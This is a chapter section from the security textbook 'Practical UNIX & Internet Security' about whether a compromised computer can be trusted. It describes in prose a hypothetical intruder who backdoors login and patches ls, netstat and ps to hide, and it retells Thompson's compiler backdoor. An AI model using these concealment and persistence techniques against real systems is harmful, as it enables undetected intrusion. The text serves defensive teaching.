Practical UNIX & Internet Security

Practical UNIX & Internet SecuritySearch this book
Previous: 26.4 Other LiabilityChapter 27Next: 27.2 Can You Trust Your Suppliers?
 

27. Who Do You Trust?

Contents:
Can you Trust Your Computer?
Can You Trust Your Suppliers?
Can You Trust People?
What All This Means

Trust is the most important quality in computer security. If you build a bridge, you can look at the bridge every morning and make sure it's still standing. If you paint a house, you can sample the soil and analyze it at a laboratory to ensure that the paint isn't causing toxic runoff. But in the field of computer security, most of the tools that you have for determining the strength of your defenses and for detecting break-ins reside on your computer itself. Those tools are as mutable as the rest of your computer system.

When your computer tells you that nobody has broken through your defenses, how do you know that you can trust what it is saying?

27.1 Can you Trust Your Computer?

For a few minutes, try thinking like a computer criminal. A few months ago you were fired from Big Whammix, the large smokestack employer on the other side of town, and now you're working for a competing company, Bigger Bammers. Your job at Bammers is corporate espionage; you've spent the last month trying to break into Big Whammix's central mail server. Yesterday, you discovered a bug in a version of sendmail [1] that Whammix is running, and you gained superuser access.

[1] This is a safe enough bet - sendmail seems to have an endless supply of bugs and design misfeatures leading to security problems.

What do you do now?

Your primary goal is to gain as much valuable corporate information as possible, and to do so without leaving any evidence that would allow you to be caught. But you have a secondary goal of masking your steps, so that your former employers at Whammix will never figure out that they have lost information.

Realizing that the hole in the Whammix sendmail daemon might someday be plugged, you decide to create a new back door that you can use to gain access to the company's computers in the future. The easiest thing to do is to modify the computer's /bin/login program to accept hidden passwords. Therefore, you take your own copy of the source code to login.c and modify it to allow anybody to log in as root if they type a particular sequence of apparently random passwords. Then you install the program as /bin/passwd .

You want to hide evidence of your data collection, so you also patch the /bin/ls program. When the program is asked to list the contents of the directory in which you are storing your cracker tools and intercepted mail, it displays none of your files. You "fix" these programs so that the checksums reported by /usr/bin/sum are the same. Then, you manipulate the system clock or edit the raw disk to set all the times in the inodes back to their original values, to further cloak your modifications.

You'll be connecting to the computer on a regular basis, so you also modify /usr/bin/netstat so that it doesn't display connections between the Big Whammix IP subnet and the subnet at Bigger Bammers. You may also modify the /usr/bin/ps and /usr/bin/who programs, so that they don't list users who are logged in via this special back door.

Content, you now spend the next five months periodically logging into the mail server at Big Whammix and making copies of all of the email directed to the marketing staff. You do so right up to the day that you leave your job at Bigger Bammers and move on to a new position at another firm. On your last day, you run a shell script that you have personally prepared that restores all of the programs on the hard disk to their original configuration. Then, as a parting gesture, your program introduces subtle modifications into the Big Whammix main accounting database.

Technological fiction? Hardly. By the middle of the 1990s, attacks against computers in which the system binaries were modified to prevent detection of the intruder had become commonplace. After sophisticated attackers gain superuser access, the common way that you discover their presence is if they make a mistake.

27.1.1 Harry's Compiler

In the early days of the MIT Media Lab, there was a graduate student who was very unpopular with the other students in his lab. To protect his privacy, we'll call the unpopular student "Harry."

Harry was obnoxious and abrasive, and he wasn't a very good programmer either. So the other students in the lab decided to play a trick on him. They modified the PL/1 compiler on the computer that they all shared so that the program would determine the name of the person who was running it. If the person running the compiler was Harry, the program would run as usual, reporting syntax errors and the like, but it would occasionally, randomly, not produce a final output file.

This mischievous prank caused a myriad of troubles for Harry. He would make a minor change to his program, run it, and - occasionally - the program would run the same way as it did before he made his modification. He would fix bugs, but the bugs would still remain. But then, whenever he went for help, one of the other students in the lab would sit down at the terminal, log in, and everything would work properly.

Poor Harry. It was a cruel trick. Somehow, though, everybody forgot to tell him about it. He soon grew frustrated with the whole enterprise, and eventually left school.

And you thought those random "bugs" in your system were there by accident?

27.1.2 Trusting Trust

Perhaps the definitive account of the problems inherent in computer security and trust is related in Ken Thompson's article, "Reflections on Trusting Trust." [2] Thompson describes a back door planted in an early research version of UNIX.

[2] Communications of the ACM, Volume 27, Number 8, August 1984.

The back door was a modification to the /bin/login program that would allow him to gain superuser access to the system at any time, even if his account had been deleted, by providing a predetermined username and password. While such a modification is easy to make, it's also an easy one to detect by looking at the computer's source code. So Thompson modified the computer's C compiler to detect if it was compiling the login.c program. If so, then the additional code for the back door would automatically be inserted into the object-code stream, even though the code was not present in the original C source file.

Thompson could now have the login.c program inspected by his coworkers, compile the program, install the /bin/login executable, and yet be assured that the back door was firmly in place.

But what if somebody inspected the source code for the C compiler itself? Thompson thought of that case as well. He further modified the C compiler so that it would detect whether it was compiling the source code for itself. If so, the compiler would automatically insert the special program recognition code. After one more round of compilation, Thompson was able to put all the original source code back in place.

Thompson's experiment was like a magic trick. There was no back door in the login.c source file and no back door in the source code for the C compiler, and yet there was a back door in both the final compiler and in the login program. Abracadabra!

What hidden actions do your compiler and login programs perform?

27.1.3 What the Superuser Can and Cannot Do

As all of these examples illustrate, technical expertise combined with superuser privileges on a computer is a powerful combination. Together, they let an attacker change the very nature of the computer's operating system. An attacker can modify the system to create "hidden" directories that don't show up under normal circumstances (if at all). Attackers can change the system clock, making it look as if the files that they modify today were actually modified months ago. An attacker can forge electronic mail. (Actually, anybody can forge electronic mail, but an attacker can do a better job of it.)

Of course, there are some things that an attacker cannot do, even if that attacker is a technical genius and has full access to your computer and its source code. An attacker cannot, for example, decrypt a message that has been encrypted with a perfect encryption algorithm. But he can alter the code to record the key the next time you type it. An attacker probably can't program your computer to perform mathematical calculations a dozen times faster than it currently does, although there are few security implications to doing so. Most attackers can't read the contents of a file after it's been written over with another file unless they take apart your computer and take the hard disk to a laboratory. However, an attacker with privileges can alter your system so that files you have deleted are still accessible (to him).

In each case, how do you tell if the attack has occurred?

The "what-if" scenario can be taken to considerable lengths. Consider an attacker who is attempting to hide a modification in a computer's /bin/login program:

Table 27.1: The "What-If" Scenario

What the Attacker Might Do After Gaining Root Access

Your Responses

The attacker plants a back door in the /bin/login program to allow unauthorized access.

You use PGP to create a digital signature of all system programs. You check the signatures every day.

The attacker modifies the version of PGP that you are using, so that it will report that the signature on /bin/login verifies, even if it doesn't.

You copy /bin/login onto another computer before verifying it with a trusted copy of PGP.

The attacker modifies your computer's kernel by adding loadable modules, so that when the /bin/login is sent through a TCP connection, the original /bin/login, rather than the modified version, is sent.

You put a copy of PGP on a removable hard disk. You mount the hard disk to perform the signature verification and then unmount it. Furthermore, you put a good copy of /bin/login onto your removable hard disk and then copy the good program over the installed version on a regular basis.

The attacker regains control of your system and further modifies the kernel so that the modification to /bin/login is patched into the running program after it loads. Any attempt to read the contents of the /bin/login file results in the original, unmodified version.

You reinstall the entire system software, and configure the system to boot from a read-only device such as a CD-ROM.

Because the system now boots from a CD-ROM, you cannot easily update system software as bugs are discovered. The attacker waits for a bug to crop up in one of your installed programs, such as sendmail. When the bug is reported, the attacker will be ready to pounce.

Your move . . .

(See Table 27.1.)

If you think that this description sounds like a game of chess, you're correct. Practical computer security is a series of actions and counteractions, of attacks and defenses. As with chess, success depends upon anticipating your opponent's moves and planning countermeasures ahead of time. Simply reacting to your opponent's moves is a recipe for failure.

The key thing to note, however, is that somewhere, at some level, you need to trust what you are working with. Maybe you trust the hardware. Maybe you trust the CD-ROM. But at some level, you need to trust what you have on hand. Perfect security isn't possible, so we need to settle for the next best thing - reasonable trust on which to build.

The question is, where do you place that trust?


Previous: 26.4 Other LiabilityPractical UNIX & Internet SecurityNext: 27.2 Can You Trust Your Suppliers?
26.4 Other LiabilityBook Index27.2 Can You Trust Your Suppliers?